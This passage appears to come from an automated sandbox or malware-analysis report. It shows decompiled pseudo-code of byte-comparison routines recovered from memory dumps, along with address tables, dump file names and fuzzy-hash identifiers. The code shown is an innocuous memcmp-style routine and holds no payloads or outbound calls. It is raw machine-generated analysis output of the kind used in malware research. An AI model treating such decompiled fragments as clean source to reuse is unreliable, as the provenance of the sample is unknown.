								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x0009b4fe
0x0009b4fe
0x0009b504
0x0009b57b
0x0009b57d
0x0009b57f
0x00000000
0x00000000
0x0009b585
0x0009b58b
0x0009b612
0x0009b614
0x0009b616
0x00000000
0x00000000
0x0009b61c
0x0009b622
0x0009b6a9
0x0009b6ab
0x0009b6ad
0x00000000
0x00000000
0x0009b6b3
0x0009b6b9
0x0009b740
0x0009b742
0x0009b744
0x00000000
0x00000000
0x0009b74a
0x0009b750
0x0009b7d7
0x0009b7d9
0x0009b7db
0x00000000
0x00000000
0x0009b7e7
0x0009b86f
0x0009b871
0x0009b873
0x00000000
0x00000000
0x0009b879
0x0009b87f
0x0009b906
0x0009b908
0x0009b90a
0x0009b918
0x0009b91a
0x0009b927
0x0009b927
0x0009b91a
0x00000000
0x0009b90a
0x0009b88c
0x0009b88e
0x0009b8a6
0x0009b8ae
0x0009b8b0
0x0009b8c8
0x0009b8d0
0x0009b8d2
0x0009b8ea
0x0009b8f2
0x0009b8f4
0x0009b8fd
0x0009b8fd
0x00000000
0x0009b8f4
0x0009b8db
0x0009b8e4
0x00000000
0x00000000
0x00000000
0x0009b8e4
0x0009b8b9
0x0009b8c2
0x00000000
0x00000000
0x00000000
0x0009b8c2
0x0009b897
0x0009b8a0
0x00000000
0x00000000
0x00000000
0x0009b8a0
0x0009b7f5
0x0009b7f7
0x0009b80f
0x0009b817
0x0009b819
0x0009b831
0x0009b839
0x0009b83b
0x0009b853
0x0009b85b
0x0009b85d
0x0009b866
0x0009b866
0x00000000
0x0009b85d
0x0009b844
0x0009b84d
0x00000000
0x00000000
0x00000000
0x0009b84d
0x0009b822
0x0009b82b
0x00000000
0x00000000
0x00000000
0x0009b82b
0x0009b800
0x0009b809
0x00000000
0x00000000
0x00000000
0x0009b809
0x0009b75d
0x0009b75f
0x0009b777
0x0009b77f
0x0009b781
0x0009b799
0x0009b7a1
0x0009b7a3
0x0009b7bb
0x0009b7c3
0x0009b7c5
0x0009b7ce
0x0009b7ce
0x00000000
0x0009b7c5
0x0009b7ac
0x0009b7b5
0x00000000
0x00000000
0x00000000
0x0009b7b5
0x0009b78a
0x0009b793
0x00000000
0x00000000
0x00000000
0x0009b793
0x0009b768
0x0009b771
0x00000000
0x00000000
0x00000000
0x0009b771
0x0009b6c6
0x0009b6c8
0x0009b6e0
0x0009b6e8
0x0009b6ea
0x0009b702
0x0009b70a
0x0009b70c
0x0009b724
0x0009b72c
0x0009b72e
0x0009b737
0x0009b737
0x00000000
0x0009b72e
0x0009b715
0x0009b71e
0x00000000
0x00000000
0x00000000
0x0009b71e
0x0009b6f3
0x0009b6fc
0x00000000
0x00000000
0x00000000
0x0009b6fc
0x0009b6d1
0x0009b6da
0x00000000
0x00000000
0x00000000
0x0009b6da
0x0009b62f
0x0009b631
0x0009b649
0x0009b651
0x0009b653
0x0009b66b
0x0009b673
0x0009b675
0x0009b68d
0x0009b695
0x0009b697
0x0009b6a0
0x0009b6a0
0x00000000
0x0009b697
0x0009b67e
0x0009b687
0x00000000
0x00000000
0x00000000
0x0009b687
0x0009b65c
0x0009b665
0x00000000
0x00000000
0x00000000
0x0009b665
0x0009b63a
0x0009b643
0x00000000
0x00000000
0x00000000
0x0009b643
0x0009b598
0x0009b59a
0x0009b5b2
0x0009b5ba
0x0009b5bc
0x0009b5d4
0x0009b5dc
0x0009b5de
0x0009b5f6
0x0009b5fe
0x0009b600
0x0009b609
0x0009b609
0x00000000
0x0009b600
0x0009b5e7
0x0009b5f0
0x00000000
0x00000000
0x00000000
0x0009b5f0
0x0009b5c5
0x0009b5ce
0x00000000
0x00000000
0x00000000
0x0009b5ce
0x0009b5a3
0x0009b5ac
0x00000000
0x00000000
0x00000000
0x0009b506
0x0009b506
0x0009b50d
0x0009b50f
0x0009b523
0x0009b523
0x0009b52b
0x0009b52d
0x0009b541
0x0009b541
0x0009b549
0x0009b54b
0x0009b55f
0x0009b55f
0x0009b567
0x0009b569
0x0009b572
0x0009b572
0x00000000
0x0009b569
0x0009b551
0x0009b554
0x0009b55d
0x00000000
0x00000000
0x00000000
0x0009b55d
0x0009b533
0x0009b536
0x0009b53f
0x00000000
0x00000000
0x00000000
0x0009b53f
0x0009b515
0x0009b518
0x0009b521
0x00000000
0x00000000
0x00000000
0x0009b521
0x0009b4f6
0x0009b4f6
0x0009c2e7

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 1229143badd53c9785a837a53ce9a02b699a3f6f0f927c5df3e40b54c50f337c
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 9EC140322091930ADFAD463EA67453FBAE15B917B131A075DD8B2CB1D6FF20D524F620

Uniqueness

Uniqueness Score: -1.00%

Function 0009B0E6, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0009B0E6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x0009b0e6
0x0009b0e6
0x0009b0e6
0x0009b0ec
0x0009b173
0x0009b175
0x0009b177
0x0009b4f6
0x0009b4f6
0x0009c2e7
0x0009c2e7
0x0009b17d
0x0009b183
0x0009b20a
0x0009b20c
0x0009b20e
0x00000000
0x00000000
0x0009b214
0x0009b21a
0x0009b2a1
0x0009b2a3
0x0009b2a5
0x00000000
0x00000000
0x0009b2ab
0x0009b2b1
0x0009b338
0x0009b33a
0x0009b33c
0x00000000
0x00000000
0x0009b348
0x0009b3d0
0x0009b3d2
0x0009b3d4
0x00000000
0x00000000
0x0009b3da
0x0009b3e0
0x0009b467
0x0009b469
0x0009b46b
0x00000000
0x00000000
0x0009b471
0x0009b477
0x0009b4ee
0x0009b4f0
0x0009b4f2
0x0009b4f4
0x0009b4f4
0x00000000
0x0009b4f2
0x0009b480
0x0009b482
0x0009b496
0x0009b49e
0x0009b4a0
0x0009b4b4
0x0009b4bc
0x0009b4be
0x0009b4d2
0x0009b4da
0x0009b4dc
0x0009b4e5
0x0009b4e5
0x00000000
0x0009b4dc
0x0009b4c7
0x0009b4d0
0x00000000
0x00000000
0x00000000
0x0009b4d0
0x0009b4a9
0x0009b4b2
0x00000000
0x00000000
0x00000000
0x0009b4b2
0x0009b48b
0x0009b494
0x00000000
0x00000000
0x00000000
0x0009b494
0x0009b3ed
0x0009b3ef
0x0009b407
0x0009b40f
0x0009b411
0x0009b429
0x0009b431
0x0009b433
0x0009b44b
0x0009b453
0x0009b455
0x0009b45e
0x0009b45e
0x00000000
0x0009b455
0x0009b43c
0x0009b445
0x00000000
0x00000000
0x00000000
0x0009b445
0x0009b41a
0x0009b423
0x00000000
0x00000000
0x00000000
0x0009b423
0x0009b3f8
0x0009b401
0x00000000
0x00000000
0x00000000
0x0009b401
0x0009b356
0x0009b358
0x0009b370
0x0009b378
0x0009b37a
0x0009b392
0x0009b39a
0x0009b39c
0x0009b3b4
0x0009b3bc
0x0009b3be
0x0009b3c7
0x0009b3c7
0x00000000
0x0009b3be
0x0009b3a5
0x0009b3ae
0x00000000
0x00000000
0x00000000
0x0009b3ae
0x0009b383
0x0009b38c
0x00000000
0x00000000
0x00000000
0x0009b38c
0x0009b361
0x0009b36a
0x00000000
0x00000000
0x00000000
0x0009b36a
0x0009b2be
0x0009b2c0
0x0009b2d8
0x0009b2e0
0x0009b2e2
0x0009b2fa
0x0009b302
0x0009b304
0x0009b31c
0x0009b324
0x0009b326
0x0009b32f
0x0009b32f
0x00000000
0x0009b326
0x0009b30d
0x0009b316
0x00000000
0x00000000
0x00000000
0x0009b316
0x0009b2eb
0x0009b2f4
0x00000000
0x00000000
0x00000000
0x0009b2f4
0x0009b2c9
0x0009b2d2
0x00000000
0x00000000
0x00000000
0x0009b2d2
0x0009b227
0x0009b229
0x0009b241
0x0009b249
0x0009b24b
0x0009b263
0x0009b26b
0x0009b26d
0x0009b285
0x0009b28d
0x0009b28f
0x0009b298
0x0009b298
0x00000000
0x0009b28f
0x0009b276
0x0009b27f
0x00000000
0x00000000
0x00000000
0x0009b27f
0x0009b254
0x0009b25d
0x00000000
0x00000000
0x00000000
0x0009b25d
0x0009b232
0x0009b23b
0x00000000
0x00000000
0x00000000
0x0009b23b
0x0009b190
0x0009b192
0x0009b1aa
0x0009b1b2
0x0009b1b4
0x0009b1cc
0x0009b1d4
0x0009b1d6
0x0009b1ee
0x0009b1f6
0x0009b1f8
0x0009b201
0x0009b201
0x00000000
0x0009b1f8
0x0009b1df
0x0009b1e8
0x00000000
0x00000000
0x00000000
0x0009b1e8
0x0009b1bd
0x0009b1c6
0x00000000
0x00000000
0x00000000
0x0009b1c6
0x0009b19b
0x0009b1a4
0x00000000
0x00000000
0x00000000
0x0009b1a4
0x0009b0f9
0x0009b0fb
0x0009b113
0x0009b11b
0x0009b11d
0x0009b135
0x0009b13d
0x0009b13f
0x0009b157
0x0009b15f
0x0009b161
0x0009b16a
0x0009b16a
0x00000000
0x0009b161
0x0009b148
0x0009b151
0x00000000
0x00000000
0x00000000
0x0009b151
0x0009b126
0x0009b12f
0x00000000
0x00000000
0x00000000
0x0009b12f
0x0009b104
0x0009b10d
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 52b9d8ba8b044fab51d1297b6e8a235508c946e5dfcbefbe253f91b3a9c275b7
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8FC13F322051930ADFAD463EA67453FBAE15BA27B131A076DD8B2CF1D6EF20D524F610

Uniqueness

Uniqueness Score: -1.00%

Function 000BA57D, Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
Instruction ID: bac217d9e25402a10fb0373ee4a54644f0ed991e796c24be71eebe5f1933b975
Opcode Fuzzy Hash: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
Instruction Fuzzy Hash: 9EB16E71610609DFD759CF28C48ABA47BE0FF06364F298658E8D9CF2A1C735D992CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000C50C0, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: fa66c24c5dba49d23e168985a7fa55f1bcc3990672d7c6f6d64b8c5bbfbcedc1
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 895180B3E54A214BD3188F09CC40635B792FFC8312B5F81BEDD199B357CA74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 000C50B7, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35229ecd8b391b6edf349c230a59ff92bea9a6eb38f83f1c4e2a32eecfbbb86f
Instruction ID: 25437689b068510503fb060d0e6486b04f94b1c1d2c37d7baf6e18bc8dae2235
Opcode Fuzzy Hash: 35229ecd8b391b6edf349c230a59ff92bea9a6eb38f83f1c4e2a32eecfbbb86f
Instruction Fuzzy Hash: A951A1B3E14A214BD318CF09CC40675B792FFC8312B5F81BEDD1A8B357CA74A9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 000C3360, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: f1c78aa35e407c8ad89a59c9ad6ac791c2e22cb69b8b36c7dacfa93a795c738d
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 8E3162116597F14DD31E436D08BDA75AEC18E5720174EC2FEDADA6F2F3C4888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 000B0C83, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5b1a4ebcdce08b187fabe9f23a6af89c5637d0724540729631bca78482fa05
Instruction ID: 14cbd32419ad58fd598892e7d4e2ac0ffe2acced946dc9ef98706778f55a4029
Opcode Fuzzy Hash: 9b5b1a4ebcdce08b187fabe9f23a6af89c5637d0724540729631bca78482fa05
Instruction Fuzzy Hash: 82E01236264609AFC754CBA8CC81D96B3E8EB19364B144394FD15C73A1D734ED009A50

Uniqueness

Uniqueness Score: -1.00%

Function 000B0CC0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: 95bfa37467f99688d5aa656d66fedb345dcd5c7430edd9f2d0ac97e0929a787e
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: 9EE04F322105509BC7619B59C940CDBFBE9FB887B0B054665E94997611D330FC40D690

Uniqueness

Uniqueness Score: -1.00%

Function 000B38C9, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

